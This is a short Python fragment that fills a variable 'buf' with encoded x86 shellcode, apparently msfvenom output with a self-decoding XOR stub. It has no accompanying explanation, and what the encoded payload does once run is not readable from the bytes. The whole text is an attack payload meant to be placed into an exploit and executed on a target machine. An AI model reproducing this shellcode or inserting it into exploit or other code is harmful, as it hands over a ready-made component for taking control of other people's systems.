buf =  b""
buf += b"\xbb\xd8\x2c\xa0\xaf\xda\xc6\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x55\x31\x5a\x14\x03\x5a\x14\x83\xc2\x04\x3a"
buf += b"\xd9\x5c\x47\x38\x22\x9d\x98\x5c\xaa\x78\xa9\x5c\xc8"
buf += b"\x09\x9a\x6c\x9a\x5c\x17\x07\xce\x74\xac\x65\xc7\x7b"
buf += b"\x05\xc3\x31\xb5\x96\x7f\x01\xd4\x14\x7d\x56\x36\x24"
buf += b"\x4e\xab\x37\x61\xb2\x46\x65\x3a\xb9\xf5\x9a\x4f\xf7"
buf += b"\xc5\x11\x03\x16\x4e\xc5\xd4\x19\x7f\x58\x6e\x40\x5f"
buf += b"\x5a\xa3\xf9\xd6\x44\xa0\xc7\xa1\xff\x12\xbc\x33\xd6"
buf += b"\x6a\x3d\x9f\x17\x43\xcc\xe1\x50\x64\x2e\x94\xa8\x96"
buf += b"\xd3\xaf\x6e\xe4\x0f\x25\x75\x4e\xc4\x9d\x51\x6e\x09"
buf += b"\x7b\x11\x7c\xe6\x0f\x7d\x61\xf9\xdc\xf5\x9d\x72\xe3"
buf += b"\xd9\x17\xc0\xc0\xfd\x7c\x93\x69\xa7\xd8\x72\x95\xb7"
buf += b"\x82\x2b\x33\xb3\x2f\x38\x4e\x9e\x27\x8d\x63\x21\xb8"
buf += b"\x99\xf4\x52\x8a\x06\xaf\xfc\xa6\xcf\x69\xfa\xbf\xc7"
buf += b"\x89\xd4\x78\x87\x77\xd5\x78\x8e\xb3\x81\x28\xb8\x12"
buf += b"\xaa\xa2\x38\x9a\x7f\x5e\x32\x0e\x80\xf7\x40\xce\x91"
buf += b"\x5b\xcd\x28\xc1\x33\x9d\xe4\xa2\xe3\x5d\x55\x4b\xee"
buf += b"\x52\x8a\x6b\x11\xb9\xa3\x06\xfe\x17\x9b\xbe\x67\x32"
buf += b"\x57\x5e\x67\xe9\x1d\x60\xe3\x1b\xe1\x2f\x04\x6e\xf1"
buf += b"\x58\x73\x90\x09\x99\x16\x90\x63\x9d\xb0\xc7\x1b\x9f"
buf += b"\xe5\x2f\x84\x60\xc0\x2c\xc3\x9f\x95\x04\xbf\x96\x03"
buf += b"\x28\xd7\xd6\xc3\xa8\x27\x81\x89\xa8\x4f\x75\xea\xfb"
buf += b"\x6a\x7a\x27\x68\x27\xef\xc8\xd8\x9b\xb8\xa0\xe6\xc2"
buf += b"\x8f\x6e\x19\x21\x8c\x69\xe5\xb7\xbb\xd1\x8d\x47\xfc"
buf += b"\xe1\x4d\x22\xfc\xb1\x25\xb9\xd3\x3e\x85\x42\xfe\x16"
buf += b"\x8d\xc9\x6f\xd4\x2c\xcd\xa5\xb8\xf0\xce\x4a\x61\x03"
buf += b"\xb4\x20\x96\xe4\x49\x2f\xf3\xe5\x49\x4f\x05\xda\x9f"
buf += b"\x76\x73\x1d\x1c\xcd\x8c\x28\x01\x64\x07\x52\x15\x76"
buf += b"\x02"

